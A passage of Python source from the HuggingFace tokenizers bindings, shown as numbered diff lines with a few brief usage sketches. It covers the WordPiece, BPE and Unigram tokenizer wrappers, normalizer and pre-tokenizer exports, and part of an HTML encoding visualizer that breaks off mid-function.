+ def post_process(self, encoding: Encoding, pair: Optional[Encoding]=None, add_special_tokens: bool=True) -> Encoding:
145
+ return self._tokenizer.post_process(encoding, pair, add_special_tokens)
146
+
147
+ @property
148
+ def model(self) -> Model:
149
+ return self._tokenizer.model
150
+
151
+ @model.setter
152
+ def model(self, model: Model):
153
+ self._tokenizer.model = model
154
+
155
+ @property
156
+ def normalizer(self) -> Normalizer:
157
+ return self._tokenizer.normalizer
158
+
159
+ @normalizer.setter
160
+ def normalizer(self, normalizer: Normalizer):
161
+ self._tokenizer.normalizer = normalizer
162
+
163
+ @property
164
+ def pre_tokenizer(self) -> PreTokenizer:
165
+ return self._tokenizer.pre_tokenizer
166
+
167
+ @pre_tokenizer.setter
168
+ def pre_tokenizer(self, pre_tokenizer: PreTokenizer):
169
+ self._tokenizer.pre_tokenizer = pre_tokenizer
170
+
171
+ @property
172
+ def post_processor(self) -> PostProcessor:
173
+ return self._tokenizer.post_processor
174
+
175
+ @post_processor.setter
176
+ def post_processor(self, post_processor: PostProcessor):
177
+ self._tokenizer.post_processor = post_processor
178
+
179
+ @property
180
+ def decoder(self) -> Decoder:
181
+ return self._tokenizer.decoder
182
+
183
+ @decoder.setter
184
+ def decoder(self, decoder: Decoder):
185
+ self._tokenizer.decoder = decoder
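A small usage sketch of the wrapper above, assuming the tokenizers package is installed; the tiny vocabulary is invented for the example.

from tokenizers import Tokenizer
from tokenizers.models import WordPiece
from tokenizers.pre_tokenizers import Whitespace
from tokenizers.implementations.base_tokenizer import BaseTokenizer

# toy vocabulary, just enough to encode "hello world"
vocab = {"[UNK]": 0, "[PAD]": 1, "hello": 2, "world": 3}
tok = Tokenizer(WordPiece(vocab, unk_token="[UNK]"))
tok.pre_tokenizer = Whitespace()

wrapper = BaseTokenizer(tok, {"model": "WordPiece"})
wrapper.add_special_tokens(["[PAD]"])
wrapper.enable_padding(pad_id=1, pad_token="[PAD]", length=4)

enc = wrapper.encode("hello world")
print(enc.tokens)               # ['hello', 'world', '[PAD]', '[PAD]']
print(wrapper.decode(enc.ids))  # 'hello world' ([PAD] skipped as a special token)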
186
+
187
+ # File: tokenizers-main/bindings/python/py_src/tokenizers/implementations/bert_wordpiece.py
188
+ from typing import Dict, Iterator, List, Optional, Union
189
+ from tokenizers import AddedToken, Tokenizer, decoders, trainers
190
+ from tokenizers.models import WordPiece
191
+ from tokenizers.normalizers import BertNormalizer
192
+ from tokenizers.pre_tokenizers import BertPreTokenizer
193
+ from tokenizers.processors import BertProcessing
194
+ from .base_tokenizer import BaseTokenizer
195
+
196
+ class BertWordPieceTokenizer(BaseTokenizer):
197
+
198
+ def __init__(self, vocab: Optional[Union[str, Dict[str, int]]]=None, unk_token: Union[str, AddedToken]='[UNK]', sep_token: Union[str, AddedToken]='[SEP]', cls_token: Union[str, AddedToken]='[CLS]', pad_token: Union[str, AddedToken]='[PAD]', mask_token: Union[str, AddedToken]='[MASK]', clean_text: bool=True, handle_chinese_chars: bool=True, strip_accents: Optional[bool]=None, lowercase: bool=True, wordpieces_prefix: str='##'):
199
+ if vocab is not None:
200
+ tokenizer = Tokenizer(WordPiece(vocab, unk_token=str(unk_token)))
201
+ else:
202
+ tokenizer = Tokenizer(WordPiece(unk_token=str(unk_token)))
203
+ if tokenizer.token_to_id(str(unk_token)) is not None:
204
+ tokenizer.add_special_tokens([str(unk_token)])
205
+ if tokenizer.token_to_id(str(sep_token)) is not None:
206
+ tokenizer.add_special_tokens([str(sep_token)])
207
+ if tokenizer.token_to_id(str(cls_token)) is not None:
208
+ tokenizer.add_special_tokens([str(cls_token)])
209
+ if tokenizer.token_to_id(str(pad_token)) is not None:
210
+ tokenizer.add_special_tokens([str(pad_token)])
211
+ if tokenizer.token_to_id(str(mask_token)) is not None:
212
+ tokenizer.add_special_tokens([str(mask_token)])
213
+ tokenizer.normalizer = BertNormalizer(clean_text=clean_text, handle_chinese_chars=handle_chinese_chars, strip_accents=strip_accents, lowercase=lowercase)
214
+ tokenizer.pre_tokenizer = BertPreTokenizer()
215
+ if vocab is not None:
216
+ sep_token_id = tokenizer.token_to_id(str(sep_token))
217
+ if sep_token_id is None:
218
+ raise TypeError('sep_token not found in the vocabulary')
219
+ cls_token_id = tokenizer.token_to_id(str(cls_token))
220
+ if cls_token_id is None:
221
+ raise TypeError('cls_token not found in the vocabulary')
222
+ tokenizer.post_processor = BertProcessing((str(sep_token), sep_token_id), (str(cls_token), cls_token_id))
223
+ tokenizer.decoder = decoders.WordPiece(prefix=wordpieces_prefix)
224
+ parameters = {'model': 'BertWordPiece', 'unk_token': unk_token, 'sep_token': sep_token, 'cls_token': cls_token, 'pad_token': pad_token, 'mask_token': mask_token, 'clean_text': clean_text, 'handle_chinese_chars': handle_chinese_chars, 'strip_accents': strip_accents, 'lowercase': lowercase, 'wordpieces_prefix': wordpieces_prefix}
225
+ super().__init__(tokenizer, parameters)
226
+
227
+ @staticmethod
228
+ def from_file(vocab: str, **kwargs):
229
+ vocab = WordPiece.read_file(vocab)
230
+ return BertWordPieceTokenizer(vocab, **kwargs)
231
+
232
+ def train(self, files: Union[str, List[str]], vocab_size: int=30000, min_frequency: int=2, limit_alphabet: int=1000, initial_alphabet: List[str]=[], special_tokens: List[Union[str, AddedToken]]=['[PAD]', '[UNK]', '[CLS]', '[SEP]', '[MASK]'], show_progress: bool=True, wordpieces_prefix: str='##'):
233
+ trainer = trainers.WordPieceTrainer(vocab_size=vocab_size, min_frequency=min_frequency, limit_alphabet=limit_alphabet, initial_alphabet=initial_alphabet, special_tokens=special_tokens, show_progress=show_progress, continuing_subword_prefix=wordpieces_prefix)
234
+ if isinstance(files, str):
235
+ files = [files]
236
+ self._tokenizer.train(files, trainer=trainer)
237
+
238
+ def train_from_iterator(self, iterator: Union[Iterator[str], Iterator[Iterator[str]]], vocab_size: int=30000, min_frequency: int=2, limit_alphabet: int=1000, initial_alphabet: List[str]=[], special_tokens: List[Union[str, AddedToken]]=['[PAD]', '[UNK]', '[CLS]', '[SEP]', '[MASK]'], show_progress: bool=True, wordpieces_prefix: str='##', length: Optional[int]=None):
239
+ trainer = trainers.WordPieceTrainer(vocab_size=vocab_size, min_frequency=min_frequency, limit_alphabet=limit_alphabet, initial_alphabet=initial_alphabet, special_tokens=special_tokens, show_progress=show_progress, continuing_subword_prefix=wordpieces_prefix)
240
+ self._tokenizer.train_from_iterator(iterator, trainer=trainer, length=length)
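A small training sketch for the class above (the corpus is made up). As the constructor shows, BertProcessing ([CLS] ... [SEP]) is only attached when a vocabulary is passed in, so a tokenizer trained from scratch like this encodes without those markers until it is re-created from the saved vocab.

from tokenizers.implementations import BertWordPieceTokenizer

corpus = ["hello world", "hello tokenizers", "the quick brown fox"]

tokenizer = BertWordPieceTokenizer(lowercase=True)
tokenizer.train_from_iterator(corpus, vocab_size=100, min_frequency=1)

enc = tokenizer.encode("hello world")
print(enc.tokens)                  # wordpieces, vocabulary dependent
print(tokenizer.get_vocab_size())  # at most 100
tokenizer.save_model(".")          # writes vocab.txt into the current directory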
241
+
242
+ # File: tokenizers-main/bindings/python/py_src/tokenizers/implementations/byte_level_bpe.py
243
+ from typing import Dict, Iterator, List, Optional, Tuple, Union
244
+ from tokenizers import AddedToken, Tokenizer, decoders, pre_tokenizers, processors, trainers
245
+ from tokenizers.models import BPE
246
+ from tokenizers.normalizers import Lowercase, Sequence, unicode_normalizer_from_str
247
+ from .base_tokenizer import BaseTokenizer
248
+
249
+ class ByteLevelBPETokenizer(BaseTokenizer):
250
+
251
+ def __init__(self, vocab: Optional[Union[str, Dict[str, int]]]=None, merges: Optional[Union[str, Dict[Tuple[int, int], Tuple[int, int]]]]=None, add_prefix_space: bool=False, lowercase: bool=False, dropout: Optional[float]=None, unicode_normalizer: Optional[str]=None, continuing_subword_prefix: Optional[str]=None, end_of_word_suffix: Optional[str]=None, trim_offsets: bool=False):
252
+ if vocab is not None and merges is not None:
253
+ tokenizer = Tokenizer(BPE(vocab, merges, dropout=dropout, continuing_subword_prefix=continuing_subword_prefix or '', end_of_word_suffix=end_of_word_suffix or ''))
254
+ else:
255
+ tokenizer = Tokenizer(BPE())
256
+ normalizers = []
257
+ if unicode_normalizer:
258
+ normalizers += [unicode_normalizer_from_str(unicode_normalizer)]
259
+ if lowercase:
260
+ normalizers += [Lowercase()]
261
+ if len(normalizers) > 0:
262
+ if len(normalizers) > 1:
263
+ tokenizer.normalizer = Sequence(normalizers)
264
+ else:
265
+ tokenizer.normalizer = normalizers[0]
266
+ tokenizer.pre_tokenizer = pre_tokenizers.ByteLevel(add_prefix_space=add_prefix_space)
267
+ tokenizer.decoder = decoders.ByteLevel()
268
+ tokenizer.post_processor = processors.ByteLevel(trim_offsets=trim_offsets)
269
+ parameters = {'model': 'ByteLevelBPE', 'add_prefix_space': add_prefix_space, 'lowercase': lowercase, 'dropout': dropout, 'unicode_normalizer': unicode_normalizer, 'continuing_subword_prefix': continuing_subword_prefix, 'end_of_word_suffix': end_of_word_suffix, 'trim_offsets': trim_offsets}
270
+ super().__init__(tokenizer, parameters)
271
+
272
+ @staticmethod
273
+ def from_file(vocab_filename: str, merges_filename: str, **kwargs):
274
+ (vocab, merges) = BPE.read_file(vocab_filename, merges_filename)
275
+ return ByteLevelBPETokenizer(vocab, merges, **kwargs)
276
+
277
+ def train(self, files: Union[str, List[str]], vocab_size: int=30000, min_frequency: int=2, show_progress: bool=True, special_tokens: List[Union[str, AddedToken]]=[]):
278
+ trainer = trainers.BpeTrainer(vocab_size=vocab_size, min_frequency=min_frequency, show_progress=show_progress, special_tokens=special_tokens, initial_alphabet=pre_tokenizers.ByteLevel.alphabet())
279
+ if isinstance(files, str):
280
+ files = [files]
281
+ self._tokenizer.train(files, trainer=trainer)
282
+
283
+ def train_from_iterator(self, iterator: Union[Iterator[str], Iterator[Iterator[str]]], vocab_size: int=30000, min_frequency: int=2, show_progress: bool=True, special_tokens: List[Union[str, AddedToken]]=[], length: Optional[int]=None):
284
+ trainer = trainers.BpeTrainer(vocab_size=vocab_size, min_frequency=min_frequency, show_progress=show_progress, special_tokens=special_tokens, initial_alphabet=pre_tokenizers.ByteLevel.alphabet())
285
+ self._tokenizer.train_from_iterator(iterator, trainer=trainer, length=length)
286
+
287
+ # File: tokenizers-main/bindings/python/py_src/tokenizers/implementations/char_level_bpe.py
288
+ from typing import Dict, Iterator, List, Optional, Tuple, Union
289
+ from .. import AddedToken, Tokenizer, decoders, pre_tokenizers, trainers
290
+ from ..models import BPE
291
+ from ..normalizers import BertNormalizer, Lowercase, Sequence, unicode_normalizer_from_str
292
+ from .base_tokenizer import BaseTokenizer
293
+
294
+ class CharBPETokenizer(BaseTokenizer):
295
+
296
+ def __init__(self, vocab: Optional[Union[str, Dict[str, int]]]=None, merges: Optional[Union[str, Dict[Tuple[int, int], Tuple[int, int]]]]=None, unk_token: Union[str, AddedToken]='<unk>', suffix: str='</w>', dropout: Optional[float]=None, lowercase: bool=False, unicode_normalizer: Optional[str]=None, bert_normalizer: bool=True, split_on_whitespace_only: bool=False):
297
+ if vocab is not None and merges is not None:
298
+ tokenizer = Tokenizer(BPE(vocab, merges, dropout=dropout, unk_token=str(unk_token), end_of_word_suffix=suffix))
299
+ else:
300
+ tokenizer = Tokenizer(BPE(unk_token=str(unk_token), dropout=dropout, end_of_word_suffix=suffix))
301
+ if tokenizer.token_to_id(str(unk_token)) is not None:
302
+ tokenizer.add_special_tokens([str(unk_token)])
303
+ normalizers = []
304
+ if unicode_normalizer:
305
+ normalizers += [unicode_normalizer_from_str(unicode_normalizer)]
306
+ if bert_normalizer:
307
+ normalizers += [BertNormalizer(lowercase=False)]
308
+ if lowercase:
309
+ normalizers += [Lowercase()]
310
+ if len(normalizers) > 0:
311
+ if len(normalizers) > 1:
312
+ tokenizer.normalizer = Sequence(normalizers)
313
+ else:
314
+ tokenizer.normalizer = normalizers[0]
315
+ if split_on_whitespace_only:
316
+ tokenizer.pre_tokenizer = pre_tokenizers.WhitespaceSplit()
317
+ else:
318
+ tokenizer.pre_tokenizer = pre_tokenizers.BertPreTokenizer()
319
+ tokenizer.decoder = decoders.BPEDecoder(suffix=suffix)
320
+ parameters = {'model': 'BPE', 'unk_token': unk_token, 'suffix': suffix, 'dropout': dropout, 'lowercase': lowercase, 'unicode_normalizer': unicode_normalizer, 'bert_normalizer': bert_normalizer, 'split_on_whitespace_only': split_on_whitespace_only}
321
+ super().__init__(tokenizer, parameters)
322
+
323
+ @staticmethod
324
+ def from_file(vocab_filename: str, merges_filename: str, **kwargs):
325
+ (vocab, merges) = BPE.read_file(vocab_filename, merges_filename)
326
+ return CharBPETokenizer(vocab, merges, **kwargs)
327
+
328
+ def train(self, files: Union[str, List[str]], vocab_size: int=30000, min_frequency: int=2, special_tokens: List[Union[str, AddedToken]]=['<unk>'], limit_alphabet: int=1000, initial_alphabet: List[str]=[], suffix: Optional[str]='</w>', show_progress: bool=True):
329
+ trainer = trainers.BpeTrainer(vocab_size=vocab_size, min_frequency=min_frequency, special_tokens=special_tokens, limit_alphabet=limit_alphabet, initial_alphabet=initial_alphabet, end_of_word_suffix=suffix, show_progress=show_progress)
330
+ if isinstance(files, str):
331
+ files = [files]
332
+ self._tokenizer.train(files, trainer=trainer)
333
+
334
+ def train_from_iterator(self, iterator: Union[Iterator[str], Iterator[Iterator[str]]], vocab_size: int=30000, min_frequency: int=2, special_tokens: List[Union[str, AddedToken]]=['<unk>'], limit_alphabet: int=1000, initial_alphabet: List[str]=[], suffix: Optional[str]='</w>', show_progress: bool=True, length: Optional[int]=None):
335
+ trainer = trainers.BpeTrainer(vocab_size=vocab_size, min_frequency=min_frequency, special_tokens=special_tokens, limit_alphabet=limit_alphabet, initial_alphabet=initial_alphabet, end_of_word_suffix=suffix, show_progress=show_progress)
336
+ self._tokenizer.train_from_iterator(iterator, trainer=trainer, length=length)
337
+
338
+ # File: tokenizers-main/bindings/python/py_src/tokenizers/implementations/sentencepiece_bpe.py
339
+ from typing import Dict, Iterator, List, Optional, Tuple, Union
340
+ from tokenizers import AddedToken, Tokenizer, decoders, pre_tokenizers, trainers
341
+ from tokenizers.models import BPE
342
+ from tokenizers.normalizers import NFKC
343
+ from .base_tokenizer import BaseTokenizer
344
+
345
+ class SentencePieceBPETokenizer(BaseTokenizer):
346
+
347
+ def __init__(self, vocab: Optional[Union[str, Dict[str, int]]]=None, merges: Optional[Union[str, Dict[Tuple[int, int], Tuple[int, int]]]]=None, unk_token: Union[str, AddedToken]='<unk>', replacement: str='▁', add_prefix_space: bool=True, dropout: Optional[float]=None, fuse_unk: Optional[bool]=False):
348
+ if vocab is not None and merges is not None:
349
+ tokenizer = Tokenizer(BPE(vocab, merges, dropout=dropout, unk_token=unk_token, fuse_unk=fuse_unk))
350
+ else:
351
+ tokenizer = Tokenizer(BPE(dropout=dropout, unk_token=unk_token, fuse_unk=fuse_unk))
352
+ if tokenizer.token_to_id(str(unk_token)) is not None:
353
+ tokenizer.add_special_tokens([str(unk_token)])
354
+ tokenizer.normalizer = NFKC()
355
+ prepend_scheme = 'always' if add_prefix_space else 'never'
356
+ tokenizer.pre_tokenizer = pre_tokenizers.Metaspace(replacement=replacement, prepend_scheme=prepend_scheme)
357
+ tokenizer.decoder = decoders.Metaspace(replacement=replacement, prepend_scheme=prepend_scheme)
358
+ parameters = {'model': 'SentencePieceBPE', 'unk_token': unk_token, 'replacement': replacement, 'add_prefix_space': add_prefix_space, 'dropout': dropout}
359
+ super().__init__(tokenizer, parameters)
360
+
361
+ @staticmethod
362
+ def from_file(vocab_filename: str, merges_filename: str, **kwargs):
363
+ (vocab, merges) = BPE.read_file(vocab_filename, merges_filename)
364
+ return SentencePieceBPETokenizer(vocab, merges, **kwargs)
365
+
366
+ def train(self, files: Union[str, List[str]], vocab_size: int=30000, min_frequency: int=2, special_tokens: List[Union[str, AddedToken]]=['<unk>'], limit_alphabet: int=1000, initial_alphabet: List[str]=[], show_progress: bool=True):
367
+ trainer = trainers.BpeTrainer(vocab_size=vocab_size, min_frequency=min_frequency, special_tokens=special_tokens, limit_alphabet=limit_alphabet, initial_alphabet=initial_alphabet, show_progress=show_progress)
368
+ if isinstance(files, str):
369
+ files = [files]
370
+ self._tokenizer.train(files, trainer=trainer)
371
+
372
+ def train_from_iterator(self, iterator: Union[Iterator[str], Iterator[Iterator[str]]], vocab_size: int=30000, min_frequency: int=2, special_tokens: List[Union[str, AddedToken]]=['<unk>'], limit_alphabet: int=1000, initial_alphabet: List[str]=[], show_progress: bool=True, length: Optional[int]=None):
373
+ trainer = trainers.BpeTrainer(vocab_size=vocab_size, min_frequency=min_frequency, special_tokens=special_tokens, limit_alphabet=limit_alphabet, initial_alphabet=initial_alphabet, show_progress=show_progress)
374
+ self._tokenizer.train_from_iterator(iterator, trainer=trainer, length=length)
375
+
376
+ # File: tokenizers-main/bindings/python/py_src/tokenizers/implementations/sentencepiece_unigram.py
377
+ import json
378
+ import os
379
+ from typing import Iterator, List, Optional, Union, Tuple
380
+ from tokenizers import AddedToken, Regex, Tokenizer, decoders, normalizers, pre_tokenizers, trainers
381
+ from tokenizers.models import Unigram
382
+ from .base_tokenizer import BaseTokenizer
383
+
384
+ class SentencePieceUnigramTokenizer(BaseTokenizer):
385
+
386
+ def __init__(self, vocab: Optional[List[Tuple[str, float]]]=None, replacement: str='▁', add_prefix_space: bool=True):
387
+ if vocab is not None:
388
+ tokenizer = Tokenizer(Unigram(vocab))
389
+ else:
390
+ tokenizer = Tokenizer(Unigram())
391
+ tokenizer.normalizer = normalizers.Sequence([normalizers.Nmt(), normalizers.NFKC(), normalizers.Replace(Regex(' {2,}'), ' ')])
392
+ prepend_scheme = 'always' if add_prefix_space else 'never'
393
+ tokenizer.pre_tokenizer = pre_tokenizers.Metaspace(replacement=replacement, prepend_scheme=prepend_scheme)
394
+ tokenizer.decoder = decoders.Metaspace(replacement=replacement, prepend_scheme=prepend_scheme)
395
+ parameters = {'model': 'SentencePieceUnigram', 'replacement': replacement, 'add_prefix_space': add_prefix_space}
396
+ super().__init__(tokenizer, parameters)
397
+
398
+ def train(self, files: Union[str, List[str]], vocab_size: int=8000, show_progress: bool=True, special_tokens: Optional[List[Union[str, AddedToken]]]=None, initial_alphabet: Optional[List[str]]=None, unk_token: Optional[str]=None):
399
+ if special_tokens is None:
400
+ special_tokens = []
401
+ if initial_alphabet is None:
402
+ initial_alphabet = []
403
+ trainer = trainers.UnigramTrainer(vocab_size=vocab_size, special_tokens=special_tokens, show_progress=show_progress, initial_alphabet=initial_alphabet, unk_token=unk_token)
404
+ if isinstance(files, str):
405
+ files = [files]
406
+ self._tokenizer.train(files, trainer=trainer)
407
+
408
+ def train_from_iterator(self, iterator: Union[Iterator[str], Iterator[Iterator[str]]], vocab_size: int=8000, show_progress: bool=True, special_tokens: Optional[List[Union[str, AddedToken]]]=None, initial_alphabet: Optional[List[str]]=None, unk_token: Optional[str]=None, length: Optional[int]=None):
409
+ if special_tokens is None:
410
+ special_tokens = []
411
+ if initial_alphabet is None:
412
+ initial_alphabet = []
413
+ trainer = trainers.UnigramTrainer(vocab_size=vocab_size, special_tokens=special_tokens, show_progress=show_progress, initial_alphabet=initial_alphabet, unk_token=unk_token)
414
+ self._tokenizer.train_from_iterator(iterator, trainer=trainer, length=length)
415
+
416
+ @staticmethod
417
+ def from_spm(filename: str):
418
+ try:
419
+ import sys
420
+ sys.path.append('.')
421
+ import sentencepiece_model_pb2 as model
422
+ except Exception:
423
+ raise Exception("You don't seem to have the required protobuf file, in order to use this function you need to run `pip install protobuf` and `wget https://raw.githubusercontent.com/google/sentencepiece/master/python/src/sentencepiece/sentencepiece_model_pb2.py` for us to be able to read the intrinsics of your spm_file. `pip install sentencepiece` is not required.")
424
+ m = model.ModelProto()
425
+ m.ParseFromString(open(filename, 'rb').read())
426
+ precompiled_charsmap = m.normalizer_spec.precompiled_charsmap
427
+ vocab = [(piece.piece, piece.score) for piece in m.pieces]
428
+ unk_id = m.trainer_spec.unk_id
429
+ model_type = m.trainer_spec.model_type
430
+ byte_fallback = m.trainer_spec.byte_fallback
431
+ if model_type != 1:
432
+ raise Exception("You're trying to run a `Unigram` model but you're file was trained with a different algorithm")
433
+ replacement = '▁'
434
+ add_prefix_space = True
435
+ tokenizer = Tokenizer(Unigram(vocab, unk_id, byte_fallback))
436
+ if precompiled_charsmap:
437
+ tokenizer.normalizer = normalizers.Sequence([normalizers.Precompiled(precompiled_charsmap), normalizers.Replace(Regex(' {2,}'), ' ')])
438
+ else:
439
+ tokenizer.normalizer = normalizers.Sequence([normalizers.Replace(Regex(' {2,}'), ' ')])
440
+ prepend_scheme = 'always' if add_prefix_space else 'never'
441
+ tokenizer.pre_tokenizer = pre_tokenizers.Metaspace(replacement=replacement, prepend_scheme=prepend_scheme)
442
+ tokenizer.decoder = decoders.Metaspace(replacement=replacement, prepend_scheme=prepend_scheme)
443
+ parameters = {'model': 'SentencePieceUnigram'}
444
+ obj = BaseTokenizer.__new__(SentencePieceUnigramTokenizer, tokenizer, parameters)
445
+ BaseTokenizer.__init__(obj, tokenizer, parameters)
446
+ return obj
447
+
448
+ # File: tokenizers-main/bindings/python/py_src/tokenizers/normalizers/__init__.py
449
+ from .. import normalizers
450
+ Normalizer = normalizers.Normalizer
451
+ BertNormalizer = normalizers.BertNormalizer
452
+ NFD = normalizers.NFD
453
+ NFKD = normalizers.NFKD
454
+ NFC = normalizers.NFC
455
+ NFKC = normalizers.NFKC
456
+ Sequence = normalizers.Sequence
457
+ Lowercase = normalizers.Lowercase
458
+ Prepend = normalizers.Prepend
459
+ Strip = normalizers.Strip
460
+ StripAccents = normalizers.StripAccents
461
+ Nmt = normalizers.Nmt
462
+ Precompiled = normalizers.Precompiled
463
+ Replace = normalizers.Replace
464
+ ByteLevel = normalizers.ByteLevel
465
+ NORMALIZERS = {'nfc': NFC, 'nfd': NFD, 'nfkc': NFKC, 'nfkd': NFKD}
466
+
467
+ def unicode_normalizer_from_str(normalizer: str) -> Normalizer:
468
+ if normalizer not in NORMALIZERS:
469
+ raise ValueError('{} is not a known unicode normalizer. Available are {}'.format(normalizer, NORMALIZERS.keys()))
470
+ return NORMALIZERS[normalizer]()
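A quick check of the helper above; the example strings are arbitrary, and normalize_str is the Normalizer method exposed by the Rust binding.

from tokenizers.normalizers import unicode_normalizer_from_str

# 'ﬁ' (U+FB01) is a compatibility ligature: NFKC expands it, NFC leaves it alone
print(unicode_normalizer_from_str("nfkc").normalize_str("ﬁle"))  # 'file'
print(unicode_normalizer_from_str("nfc").normalize_str("ﬁle"))   # 'ﬁle'

try:
    unicode_normalizer_from_str("nfx")
except ValueError as err:
    print(err)  # lists the known normalizers: nfc, nfd, nfkc, nfkd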
471
+
472
+ # File: tokenizers-main/bindings/python/py_src/tokenizers/pre_tokenizers/__init__.py
473
+ from .. import pre_tokenizers
474
+ PreTokenizer = pre_tokenizers.PreTokenizer
475
+ BertPreTokenizer = pre_tokenizers.BertPreTokenizer
476
+ ByteLevel = pre_tokenizers.ByteLevel
477
+ CharDelimiterSplit = pre_tokenizers.CharDelimiterSplit
478
+ Digits = pre_tokenizers.Digits
479
+ Metaspace = pre_tokenizers.Metaspace
480
+ Punctuation = pre_tokenizers.Punctuation
481
+ Sequence = pre_tokenizers.Sequence
482
+ Split = pre_tokenizers.Split
483
+ UnicodeScripts = pre_tokenizers.UnicodeScripts
484
+ Whitespace = pre_tokenizers.Whitespace
485
+ WhitespaceSplit = pre_tokenizers.WhitespaceSplit
486
+
487
+ # File: tokenizers-main/bindings/python/py_src/tokenizers/tools/visualizer.py
488
+ import itertools
489
+ import os
490
+ import re
491
+ from string import Template
492
+ from typing import Any, Callable, Dict, List, NamedTuple, Optional, Tuple
493
+ from tokenizers import Encoding, Tokenizer
494
+ dirname = os.path.dirname(__file__)
495
+ css_filename = os.path.join(dirname, 'visualizer-styles.css')
496
+ with open(css_filename) as f:
497
+ css = f.read()
498
+
499
+ class Annotation:
500
+ start: int
501
+ end: int
502
+ label: str
503
+
504
+ def __init__(self, start: int, end: int, label: str):
505
+ self.start = start
506
+ self.end = end
507
+ self.label = label
508
+ AnnotationList = List[Annotation]
509
+ PartialIntList = List[Optional[int]]
510
+
511
+ class CharStateKey(NamedTuple):
512
+ token_ix: Optional[int]
513
+ anno_ix: Optional[int]
514
+
515
+ class CharState:
516
+ char_ix: Optional[int]
517
+
518
+ def __init__(self, char_ix):
519
+ self.char_ix = char_ix
520
+ self.anno_ix: Optional[int] = None
521
+ self.tokens: List[int] = []
522
+
523
+ @property
524
+ def token_ix(self):
525
+ return self.tokens[0] if len(self.tokens) > 0 else None
526
+
527
+ @property
528
+ def is_multitoken(self):
529
+ return len(self.tokens) > 1
530
+
531
+ def partition_key(self) -> CharStateKey:
532
+ return CharStateKey(token_ix=self.token_ix, anno_ix=self.anno_ix)
533
+
534
+ class Aligned:
535
+ pass
536
+
537
+ class EncodingVisualizer:
538
+ unk_token_regex = re.compile(r'(.{1}\b)?(unk|oov)(\b.{1})?', flags=re.IGNORECASE)
539
+
540
+ def __init__(self, tokenizer: Tokenizer, default_to_notebook: bool=True, annotation_converter: Optional[Callable[[Any], Annotation]]=None):
541
+ if default_to_notebook:
542
+ try:
543
+ from IPython.core.display import HTML, display
544
+ except ImportError:
545
+ raise Exception("We couldn't import IPython utils for html display.\n Are you running in a notebook?\n You can also pass `default_to_notebook=False` to get back raw HTML\n ")
546
+ self.tokenizer = tokenizer
547
+ self.default_to_notebook = default_to_notebook
548
+ self.annotation_coverter = annotation_converter
549
+ pass
550
+
551
+ def __call__(self, text: str, annotations: AnnotationList=[], default_to_notebook: Optional[bool]=None) -> Optional[str]:
552
+ final_default_to_notebook = self.default_to_notebook
553
+ if default_to_notebook is not None:
554
+ final_default_to_notebook = default_to_notebook
555
+ if final_default_to_notebook:
556
+ try:
557
+ from IPython.core.display import HTML, display
558
+ except ImportError:
559
+ raise Exception("We couldn't import IPython utils for html display.\n Are you running in a notebook?")
560
+ if self.annotation_coverter is not None:
561
+ annotations = list(map(self.annotation_coverter, annotations))
562
+ encoding = self.tokenizer.encode(text)
563
+ html = EncodingVisualizer.__make_html(text, encoding, annotations)
564
+ if final_default_to_notebook:
565
+ display(HTML(html))
566
+ else:
567
+ return html
568
+
569
+ @staticmethod
570
+ def calculate_label_colors(annotations: AnnotationList) -> Dict[str, str]:
571
+ if len(annotations) == 0:
572
+ return {}
573
+ labels = set(map(lambda x: x.label, annotations))
574
+ num_labels = len(labels)
575
+ h_step = int(255 / num_labels)
576
+ if h_step < 20:
577
+ h_step = 20
578
+ s = 32
579
+ l = 64
580
+ h = 10
581
+ colors = {}
582
+ for label in sorted(labels):
583
+ colors[label] = f'hsl({h},{s}%,{l}%)'
584
+ h += h_step
585
+ return colors
586
+
587
+ @staticmethod
588
+ def consecutive_chars_to_html(consecutive_chars_list: List[CharState], text: str, encoding: Encoding):
589
+ first = consecutive_chars_list[0]
590
+ if first.char_ix is None:
591
+ stoken = encoding.tokens[first.token_ix]
592
+ return f'<span class="special-token" data-stoken={stoken}></span>'
593
+ last = consecutive_chars_list[-1]
594
+ start = first.char_ix
595
+ end = last.char_ix + 1
596
+ span_text = text[start:end]
597
+ css_classes = []
598
+ data_items = {}
599
+ if first.token_ix is not None:
600
+ css_classes.append('token')
601
+ if first.is_multitoken:
602
+ css_classes.append('multi-token')
603
+ if first.token_ix % 2:
604
+ css_classes.append('odd-token')
605
+ else:
606
+ css_classes.append('even-token')
607
+ if EncodingVisualizer.unk_token_regex.search(encoding.tokens[first.token_ix]) is not None:
608
+ css_classes.append('special-token')
609
+ data_items['stok'] = encoding.tokens[first.token_ix]
610
+ else:
611
+ css_classes.append('non-token')
612
+ css = f'''class="{' '.join(css_classes)}"'''
613
+ data = ''
614
+ for (key, val) in data_items.items():
615
+ data += f' data-{key}="{val}"'
616
+ return f'<span {css} {data} >{span_text}</span>'
617
+
618
+ @staticmethod
619
+ def __make_html(text: str, encoding: Encoding, annotations: AnnotationList) -> str:
620
+ char_states = EncodingVisualizer.__make_char_states(text, encoding, annotations)
621
+ current_consecutive_chars = [char_states[0]]
622
+ prev_anno_ix = char_states[0].anno_ix
623
+ spans = []
624
+ label_colors_dict = EncodingVisualizer.calculate_label_colors(annotations)
625
+ cur_anno_ix = char_states[0].anno_ix
626
+ if cur_anno_ix is not None:
627
+ anno = annotations[cur_anno_ix]
628
+ label = anno.label
629
+ color = label_colors_dict[label]
630
+ spans.append(f'<span class="annotation" style="color:{color}" data-label="{label}">')
631
+ for cs in char_states[1:]:
632
+ cur_anno_ix = cs.anno_ix
633
+ if cur_anno_ix != prev_anno_ix:
634
+ spans.append(EncodingVisualizer.consecutive_chars_to_html(current_consecutive_chars, text=text, encoding=encoding))
635
+ current_consecutive_chars = [cs]
636
+ if prev_anno_ix is not None:
637
+ spans.append('</span>')
638
+ if cur_anno_ix is not None:
639
+ anno = annotations[cur_anno_ix]
640
+ label = anno.label
641
+ color = label_colors_dict[label]
642
+ spans.append(f'<span class="annotation" style="color:{color}" data-label="{label}">')
643
+ prev_anno_ix = cur_anno_ix
644
+ if cs.partition_key() == current_consecutive_chars[0].partition_key():
645
+ current_consecutive_chars.append(cs)
646
+ else:
647
+ spans.append(EncodingVisualizer.consecutive_chars_to_html(current_consecutive_chars, text=text, encoding=encoding))
648
+ current_consecutive_chars = [cs]
649
+ spans.append(EncodingVisualizer.consecutive_chars_to_html(current_consecutive_chars, text=text, encoding=encoding))
650
+ res = HTMLBody(spans)
651
+ return res
652
+
653
+ @staticmethod
654
+ def __make_anno_map(text: str, annotations: AnnotationList) -> PartialIntList:
655
+ annotation_map = [None] * len(text)
656
+ for (anno_ix, a) in enumerate(annotations):
657
+ for i in range(a.start, a.end):
658
